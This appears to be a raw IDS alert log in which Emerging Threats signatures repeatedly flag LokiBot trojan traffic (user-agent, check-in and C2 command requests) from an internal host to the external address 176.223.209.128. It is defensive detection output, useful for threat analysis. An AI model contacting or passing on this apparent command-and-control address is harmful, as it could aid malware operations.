                                              11/25/21-10:53:12.051973TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5044080192.168.11.20176.223.209.128
                                              11/25/21-10:53:12.051973TCP2025381ET TROJAN LokiBot Checkin5044080192.168.11.20176.223.209.128
                                              11/25/21-10:53:12.051973TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25044080192.168.11.20176.223.209.128
                                              11/25/21-10:53:12.567729TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15044180192.168.11.20176.223.209.128
                                              11/25/21-10:53:12.567729TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5044180192.168.11.20176.223.209.128
                                              11/25/21-10:53:12.567729TCP2025381ET TROJAN LokiBot Checkin5044180192.168.11.20176.223.209.128
                                              11/25/21-10:53:12.567729TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25044180192.168.11.20176.223.209.128
                                              11/25/21-10:53:13.013848TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15044280192.168.11.20176.223.209.128
                                              11/25/21-10:53:13.013848TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5044280192.168.11.20176.223.209.128
                                              11/25/21-10:53:13.013848TCP2025381ET TROJAN LokiBot Checkin5044280192.168.11.20176.223.209.128
                                              11/25/21-10:53:13.013848TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25044280192.168.11.20176.223.209.128
                                              11/25/21-10:53:13.443385TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15044380192.168.11.20176.223.209.128
                                              11/25/21-10:53:13.443385TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5044380192.168.11.20176.223.209.128
                                              11/25/21-10:53:13.443385TCP2025381ET TROJAN LokiBot Checkin5044380192.168.11.20176.223.209.128
                                              11/25/21-10:53:13.443385TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25044380192.168.11.20176.223.209.128
                                              11/25/21-10:53:13.950038TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15044480192.168.11.20176.223.209.128
                                              11/25/21-10:53:13.950038TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5044480192.168.11.20176.223.209.128
                                              11/25/21-10:53:13.950038TCP2025381ET TROJAN LokiBot Checkin5044480192.168.11.20176.223.209.128
                                              11/25/21-10:53:13.950038TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25044480192.168.11.20176.223.209.128
                                              11/25/21-10:53:14.461542TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15044580192.168.11.20176.223.209.128
                                              11/25/21-10:53:14.461542TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5044580192.168.11.20176.223.209.128
                                              11/25/21-10:53:14.461542TCP2025381ET TROJAN LokiBot Checkin5044580192.168.11.20176.223.209.128
                                              11/25/21-10:53:14.461542TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25044580192.168.11.20176.223.209.128
                                              11/25/21-10:53:14.963607TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15044680192.168.11.20176.223.209.128
                                              11/25/21-10:53:14.963607TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5044680192.168.11.20176.223.209.128
                                              11/25/21-10:53:14.963607TCP2025381ET TROJAN LokiBot Checkin5044680192.168.11.20176.223.209.128
                                              11/25/21-10:53:14.963607TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25044680192.168.11.20176.223.209.128
                                              11/25/21-10:53:15.460895TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15044780192.168.11.20176.223.209.128
                                              11/25/21-10:53:15.460895TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5044780192.168.11.20176.223.209.128
                                              11/25/21-10:53:15.460895TCP2025381ET TROJAN LokiBot Checkin5044780192.168.11.20176.223.209.128
                                              11/25/21-10:53:15.460895TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25044780192.168.11.20176.223.209.128
                                              11/25/21-10:53:15.970796TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15044880192.168.11.20176.223.209.128
                                              11/25/21-10:53:15.970796TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5044880192.168.11.20176.223.209.128
                                              11/25/21-10:53:15.970796TCP2025381ET TROJAN LokiBot Checkin5044880192.168.11.20176.223.209.128
                                              11/25/21-10:53:15.970796TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25044880192.168.11.20176.223.209.128
                                              11/25/21-10:53:16.443543TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15044980192.168.11.20176.223.209.128
                                              11/25/21-10:53:16.443543TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5044980192.168.11.20176.223.209.128
                                              11/25/21-10:53:16.443543TCP2025381ET TROJAN LokiBot Checkin5044980192.168.11.20176.223.209.128
                                              11/25/21-10:53:16.443543TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25044980192.168.11.20176.223.209.128
                                              11/25/21-10:53:16.946928TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15045080192.168.11.20176.223.209.128
                                              11/25/21-10:53:16.946928TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5045080192.168.11.20176.223.209.128
                                              11/25/21-10:53:16.946928TCP2025381ET TROJAN LokiBot Checkin5045080192.168.11.20176.223.209.128
                                              11/25/21-10:53:16.946928TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25045080192.168.11.20176.223.209.128
                                              11/25/21-10:53:17.460876TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15045180192.168.11.20176.223.209.128
                                              11/25/21-10:53:17.460876TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5045180192.168.11.20176.223.209.128
                                              11/25/21-10:53:17.460876TCP2025381ET TROJAN LokiBot Checkin5045180192.168.11.20176.223.209.128
                                              11/25/21-10:53:17.460876TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25045180192.168.11.20176.223.209.128
                                              11/25/21-10:53:17.961556TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15045280192.168.11.20176.223.209.128
                                              11/25/21-10:53:17.961556TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5045280192.168.11.20176.223.209.128
                                              11/25/21-10:53:17.961556TCP2025381ET TROJAN LokiBot Checkin5045280192.168.11.20176.223.209.128
                                              11/25/21-10:53:17.961556TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25045280192.168.11.20176.223.209.128
                                              11/25/21-10:53:18.455844TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15045380192.168.11.20176.223.209.128
                                              11/25/21-10:53:18.455844TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5045380192.168.11.20176.223.209.128
                                              11/25/21-10:53:18.455844TCP2025381ET TROJAN LokiBot Checkin5045380192.168.11.20176.223.209.128
                                              11/25/21-10:53:18.455844TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25045380192.168.11.20176.223.209.128
                                              11/25/21-10:53:18.884130TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15045480192.168.11.20176.223.209.128
                                              11/25/21-10:53:18.884130TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5045480192.168.11.20176.223.209.128
                                              11/25/21-10:53:18.884130TCP2025381ET TROJAN LokiBot Checkin5045480192.168.11.20176.223.209.128
                                              11/25/21-10:53:18.884130TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25045480192.168.11.20176.223.209.128
                                              11/25/21-10:53:19.409172TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15045580192.168.11.20176.223.209.128
                                              11/25/21-10:53:19.409172TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5045580192.168.11.20176.223.209.128
                                              11/25/21-10:53:19.409172TCP2025381ET TROJAN LokiBot Checkin5045580192.168.11.20176.223.209.128
                                              11/25/21-10:53:19.409172TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25045580192.168.11.20176.223.209.128
                                              11/25/21-10:53:19.898078TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15045680192.168.11.20176.223.209.128
                                              11/25/21-10:53:19.898078TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5045680192.168.11.20176.223.209.128
                                              11/25/21-10:53:19.898078TCP2025381ET TROJAN LokiBot Checkin5045680192.168.11.20176.223.209.128
                                              11/25/21-10:53:19.898078TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25045680192.168.11.20176.223.209.128
                                              11/25/21-10:53:20.393989TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15045880192.168.11.20176.223.209.128
                                              11/25/21-10:53:20.393989TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5045880192.168.11.20176.223.209.128
                                              11/25/21-10:53:20.393989TCP2025381ET TROJAN LokiBot Checkin5045880192.168.11.20176.223.209.128
                                              11/25/21-10:53:20.393989TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25045880192.168.11.20176.223.209.128
                                              11/25/21-10:53:20.908345TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15045980192.168.11.20176.223.209.128
                                              11/25/21-10:53:20.908345TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5045980192.168.11.20176.223.209.128
                                              11/25/21-10:53:20.908345TCP2025381ET TROJAN LokiBot Checkin5045980192.168.11.20176.223.209.128
                                              11/25/21-10:53:20.908345TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25045980192.168.11.20176.223.209.128
                                              11/25/21-10:53:21.387957TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15046080192.168.11.20176.223.209.128
                                              11/25/21-10:53:21.387957TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5046080192.168.11.20176.223.209.128
                                              11/25/21-10:53:21.387957TCP2025381ET TROJAN LokiBot Checkin5046080192.168.11.20176.223.209.128
                                              11/25/21-10:53:21.387957TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25046080192.168.11.20176.223.209.128
                                              11/25/21-10:53:21.894494TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15046180192.168.11.20176.223.209.128
                                              11/25/21-10:53:21.894494TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5046180192.168.11.20176.223.209.128
                                              11/25/21-10:53:21.894494TCP2025381ET TROJAN LokiBot Checkin5046180192.168.11.20176.223.209.128
                                              11/25/21-10:53:21.894494TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25046180192.168.11.20176.223.209.128
                                              11/25/21-10:53:22.409035TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15046280192.168.11.20176.223.209.128
                                              11/25/21-10:53:22.409035TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5046280192.168.11.20176.223.209.128
                                              11/25/21-10:53:22.409035TCP2025381ET TROJAN LokiBot Checkin5046280192.168.11.20176.223.209.128
                                              11/25/21-10:53:22.409035TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25046280192.168.11.20176.223.209.128
                                              11/25/21-10:53:22.929210TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15046380192.168.11.20176.223.209.128
                                              11/25/21-10:53:22.929210TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5046380192.168.11.20176.223.209.128
                                              11/25/21-10:53:22.929210TCP2025381ET TROJAN LokiBot Checkin5046380192.168.11.20176.223.209.128
                                              11/25/21-10:53:22.929210TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25046380192.168.11.20176.223.209.128
                                              11/25/21-10:53:23.429112TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15046480192.168.11.20176.223.209.128
                                              11/25/21-10:53:23.429112TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5046480192.168.11.20176.223.209.128
                                              11/25/21-10:53:23.429112TCP2025381ET TROJAN LokiBot Checkin5046480192.168.11.20176.223.209.128
                                              11/25/21-10:53:23.429112TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25046480192.168.11.20176.223.209.128
                                              11/25/21-10:53:23.867977TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15046580192.168.11.20176.223.209.128
                                              11/25/21-10:53:23.867977TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5046580192.168.11.20176.223.209.128
                                              11/25/21-10:53:23.867977TCP2025381ET TROJAN LokiBot Checkin5046580192.168.11.20176.223.209.128
                                              11/25/21-10:53:23.867977TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25046580192.168.11.20176.223.209.128
                                              11/25/21-10:53:24.376610TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15046680192.168.11.20176.223.209.128
                                              11/25/21-10:53:24.376610TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5046680192.168.11.20176.223.209.128
                                              11/25/21-10:53:24.376610TCP2025381ET TROJAN LokiBot Checkin5046680192.168.11.20176.223.209.128
                                              11/25/21-10:53:24.376610TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25046680192.168.11.20176.223.209.128
                                              11/25/21-10:53:24.847520TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15046780192.168.11.20176.223.209.128
                                              11/25/21-10:53:24.847520TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5046780192.168.11.20176.223.209.128
                                              11/25/21-10:53:24.847520TCP2025381ET TROJAN LokiBot Checkin5046780192.168.11.20176.223.209.128
                                              11/25/21-10:53:24.847520TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25046780192.168.11.20176.223.209.128
                                              11/25/21-10:53:25.354969TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15046880192.168.11.20176.223.209.128
                                              11/25/21-10:53:25.354969TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5046880192.168.11.20176.223.209.128
                                              11/25/21-10:53:25.354969TCP2025381ET TROJAN LokiBot Checkin5046880192.168.11.20176.223.209.128
                                              11/25/21-10:53:25.354969TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25046880192.168.11.20176.223.209.128
                                              11/25/21-10:53:25.882854TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15046980192.168.11.20176.223.209.128
                                              11/25/21-10:53:25.882854TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5046980192.168.11.20176.223.209.128
                                              11/25/21-10:53:25.882854TCP2025381ET TROJAN LokiBot Checkin5046980192.168.11.20176.223.209.128
                                              11/25/21-10:53:25.882854TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25046980192.168.11.20176.223.209.128
                                              11/25/21-10:53:26.385596TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15047080192.168.11.20176.223.209.128
                                              11/25/21-10:53:26.385596TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5047080192.168.11.20176.223.209.128
                                              11/25/21-10:53:26.385596TCP2025381ET TROJAN LokiBot Checkin5047080192.168.11.20176.223.209.128
                                              11/25/21-10:53:26.385596TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25047080192.168.11.20176.223.209.128
                                              11/25/21-10:53:26.886544TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15047180192.168.11.20176.223.209.128
                                              11/25/21-10:53:26.886544TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5047180192.168.11.20176.223.209.128
                                              11/25/21-10:53:26.886544TCP2025381ET TROJAN LokiBot Checkin5047180192.168.11.20176.223.209.128
                                              11/25/21-10:53:26.886544TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25047180192.168.11.20176.223.209.128
                                              11/25/21-10:53:27.350877TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15047280192.168.11.20176.223.209.128
                                              11/25/21-10:53:27.350877TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5047280192.168.11.20176.223.209.128
                                              11/25/21-10:53:27.350877TCP2025381ET TROJAN LokiBot Checkin5047280192.168.11.20176.223.209.128
                                              11/25/21-10:53:27.350877TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25047280192.168.11.20176.223.209.128
                                              11/25/21-10:53:27.846663TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15047380192.168.11.20176.223.209.128
                                              11/25/21-10:53:27.846663TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5047380192.168.11.20176.223.209.128
                                              11/25/21-10:53:27.846663TCP2025381ET TROJAN LokiBot Checkin5047380192.168.11.20176.223.209.128
                                              11/25/21-10:53:27.846663TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25047380192.168.11.20176.223.209.128
                                              11/25/21-10:53:28.355336TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15047480192.168.11.20176.223.209.128
                                              11/25/21-10:53:28.355336TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5047480192.168.11.20176.223.209.128
                                              11/25/21-10:53:28.355336TCP2025381ET TROJAN LokiBot Checkin5047480192.168.11.20176.223.209.128
                                              11/25/21-10:53:28.355336TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25047480192.168.11.20176.223.209.128
                                              11/25/21-10:53:28.862322TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15047580192.168.11.20176.223.209.128
                                              11/25/21-10:53:28.862322TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5047580192.168.11.20176.223.209.128
                                              11/25/21-10:53:28.862322TCP2025381ET TROJAN LokiBot Checkin5047580192.168.11.20176.223.209.128
                                              11/25/21-10:53:28.862322TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25047580192.168.11.20176.223.209.128
                                              11/25/21-10:53:29.372843TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15047680192.168.11.20176.223.209.128
                                              11/25/21-10:53:29.372843TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5047680192.168.11.20176.223.209.128
                                              11/25/21-10:53:29.372843TCP2025381ET TROJAN LokiBot Checkin5047680192.168.11.20176.223.209.128
                                              11/25/21-10:53:29.372843TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25047680192.168.11.20176.223.209.128
                                              11/25/21-10:53:29.843203TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15047780192.168.11.20176.223.209.128
                                              11/25/21-10:53:29.843203TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5047780192.168.11.20176.223.209.128
                                              11/25/21-10:53:29.843203TCP2025381ET TROJAN LokiBot Checkin5047780192.168.11.20176.223.209.128
                                              11/25/21-10:53:29.843203TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25047780192.168.11.20176.223.209.128
                                              11/25/21-10:53:30.308855TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15047880192.168.11.20176.223.209.128
                                              11/25/21-10:53:30.308855TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5047880192.168.11.20176.223.209.128
                                              11/25/21-10:53:30.308855TCP2025381ET TROJAN LokiBot Checkin5047880192.168.11.20176.223.209.128
                                              11/25/21-10:53:30.308855TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25047880192.168.11.20176.223.209.128
                                              11/25/21-10:53:30.786736TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15047980192.168.11.20176.223.209.128
                                              11/25/21-10:53:30.786736TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5047980192.168.11.20176.223.209.128
                                              11/25/21-10:53:30.786736TCP2025381ET TROJAN LokiBot Checkin5047980192.168.11.20176.223.209.128
                                              11/25/21-10:53:30.786736TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25047980192.168.11.20176.223.209.128
                                              11/25/21-10:53:31.296934TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15048080192.168.11.20176.223.209.128
                                              11/25/21-10:53:31.296934TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5048080192.168.11.20176.223.209.128
                                              11/25/21-10:53:31.296934TCP2025381ET TROJAN LokiBot Checkin5048080192.168.11.20176.223.209.128
                                              11/25/21-10:53:31.296934TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25048080192.168.11.20176.223.209.128
                                              11/25/21-10:53:31.808200TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15048180192.168.11.20176.223.209.128
                                              11/25/21-10:53:31.808200TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5048180192.168.11.20176.223.209.128
                                              11/25/21-10:53:31.808200TCP2025381ET TROJAN LokiBot Checkin5048180192.168.11.20176.223.209.128
                                              11/25/21-10:53:31.808200TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25048180192.168.11.20176.223.209.128
                                              11/25/21-10:53:32.331859TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15048280192.168.11.20176.223.209.128
                                              11/25/21-10:53:32.331859TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5048280192.168.11.20176.223.209.128
                                              11/25/21-10:53:32.331859TCP2025381ET TROJAN LokiBot Checkin5048280192.168.11.20176.223.209.128
                                              11/25/21-10:53:32.331859TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25048280192.168.11.20176.223.209.128
                                              11/25/21-10:53:32.797645TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15048380192.168.11.20176.223.209.128
                                              11/25/21-10:53:32.797645TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5048380192.168.11.20176.223.209.128
                                              11/25/21-10:53:32.797645TCP2025381ET TROJAN LokiBot Checkin5048380192.168.11.20176.223.209.128
                                              11/25/21-10:53:32.797645TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25048380192.168.11.20176.223.209.128
                                              11/25/21-10:53:33.325394TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15048480192.168.11.20176.223.209.128
                                              11/25/21-10:53:33.325394TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5048480192.168.11.20176.223.209.128
                                              11/25/21-10:53:33.325394TCP2025381ET TROJAN LokiBot Checkin5048480192.168.11.20176.223.209.128
                                              11/25/21-10:53:33.325394TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25048480192.168.11.20176.223.209.128
                                              11/25/21-10:53:33.845490TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15048580192.168.11.20176.223.209.128
                                              11/25/21-10:53:33.845490TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5048580192.168.11.20176.223.209.128
                                              11/25/21-10:53:33.845490TCP2025381ET TROJAN LokiBot Checkin5048580192.168.11.20176.223.209.128
                                              11/25/21-10:53:33.845490TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25048580192.168.11.20176.223.209.128
                                              11/25/21-10:53:34.266818TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15048680192.168.11.20176.223.209.128
                                              11/25/21-10:53:34.266818TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5048680192.168.11.20176.223.209.128
                                              11/25/21-10:53:34.266818TCP2025381ET TROJAN LokiBot Checkin5048680192.168.11.20176.223.209.128
                                              11/25/21-10:53:34.266818TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25048680192.168.11.20176.223.209.128
                                              11/25/21-10:53:34.777722TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15048780192.168.11.20176.223.209.128
                                              11/25/21-10:53:34.777722TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5048780192.168.11.20176.223.209.128
                                              11/25/21-10:53:34.777722TCP2025381ET TROJAN LokiBot Checkin5048780192.168.11.20176.223.209.128
                                              11/25/21-10:53:34.777722TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25048780192.168.11.20176.223.209.128
                                              11/25/21-10:53:35.308824TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15048880192.168.11.20176.223.209.128
                                              11/25/21-10:53:35.308824TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5048880192.168.11.20176.223.209.128
                                              11/25/21-10:53:35.308824TCP2025381ET TROJAN LokiBot Checkin5048880192.168.11.20176.223.209.128
                                              11/25/21-10:53:35.308824TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25048880192.168.11.20176.223.209.128
                                              11/25/21-10:53:35.762265TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15048980192.168.11.20176.223.209.128
                                              11/25/21-10:53:35.762265TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5048980192.168.11.20176.223.209.128
                                              11/25/21-10:53:35.762265TCP2025381ET TROJAN LokiBot Checkin5048980192.168.11.20176.223.209.128
                                              11/25/21-10:53:35.762265TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25048980192.168.11.20176.223.209.128
                                              11/25/21-10:53:36.258620TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15049080192.168.11.20176.223.209.128
                                              11/25/21-10:53:36.258620TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5049080192.168.11.20176.223.209.128
                                              11/25/21-10:53:36.258620TCP2025381ET TROJAN LokiBot Checkin5049080192.168.11.20176.223.209.128
                                              11/25/21-10:53:36.258620TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25049080192.168.11.20176.223.209.128
                                              11/25/21-10:53:36.772211TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15049180192.168.11.20176.223.209.128
                                              11/25/21-10:53:36.772211TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5049180192.168.11.20176.223.209.128
                                              11/25/21-10:53:36.772211TCP2025381ET TROJAN LokiBot Checkin5049180192.168.11.20176.223.209.128
                                              11/25/21-10:53:36.772211TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25049180192.168.11.20176.223.209.128
                                              11/25/21-10:53:37.268575TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15049280192.168.11.20176.223.209.128
                                              11/25/21-10:53:37.268575TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5049280192.168.11.20176.223.209.128
                                              11/25/21-10:53:37.268575TCP2025381ET TROJAN LokiBot Checkin5049280192.168.11.20176.223.209.128
                                              11/25/21-10:53:37.268575TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25049280192.168.11.20176.223.209.128
                                              11/25/21-10:53:37.770352TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15049380192.168.11.20176.223.209.128
                                              11/25/21-10:53:37.770352TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5049380192.168.11.20176.223.209.128
                                              11/25/21-10:53:37.770352TCP2025381ET TROJAN LokiBot Checkin5049380192.168.11.20176.223.209.128
                                              11/25/21-10:53:37.770352TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25049380192.168.11.20176.223.209.128
                                              11/25/21-10:53:38.269614TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15049480192.168.11.20176.223.209.128
                                              11/25/21-10:53:38.269614TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5049480192.168.11.20176.223.209.128
                                              11/25/21-10:53:38.269614TCP2025381ET TROJAN LokiBot Checkin5049480192.168.11.20176.223.209.128
                                              11/25/21-10:53:38.269614TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25049480192.168.11.20176.223.209.128
                                              11/25/21-10:53:38.709614TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15049580192.168.11.20176.223.209.128
                                              11/25/21-10:53:38.709614TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5049580192.168.11.20176.223.209.128
                                              11/25/21-10:53:38.709614TCP2025381ET TROJAN LokiBot Checkin5049580192.168.11.20176.223.209.128
                                              11/25/21-10:53:38.709614TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25049580192.168.11.20176.223.209.128
                                              11/25/21-10:53:39.207845TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15049680192.168.11.20176.223.209.128
                                              11/25/21-10:53:39.207845TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5049680192.168.11.20176.223.209.128
                                              11/25/21-10:53:39.207845TCP2025381ET TROJAN LokiBot Checkin5049680192.168.11.20176.223.209.128
                                              11/25/21-10:53:39.207845TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25049680192.168.11.20176.223.209.128
                                              11/25/21-10:53:39.732608TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15049780192.168.11.20176.223.209.128
                                              11/25/21-10:53:39.732608TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5049780192.168.11.20176.223.209.128
                                              11/25/21-10:53:39.732608TCP2025381ET TROJAN LokiBot Checkin5049780192.168.11.20176.223.209.128
                                              11/25/21-10:53:39.732608TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25049780192.168.11.20176.223.209.128
                                              11/25/21-10:53:40.243964TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15049880192.168.11.20176.223.209.128
                                              11/25/21-10:53:40.243964TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5049880192.168.11.20176.223.209.128
                                              11/25/21-10:53:40.243964TCP2025381ET TROJAN LokiBot Checkin5049880192.168.11.20176.223.209.128
                                              11/25/21-10:53:40.243964TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25049880192.168.11.20176.223.209.128
                                              11/25/21-10:53:40.753145TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15049980192.168.11.20176.223.209.128
                                              11/25/21-10:53:40.753145TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5049980192.168.11.20176.223.209.128
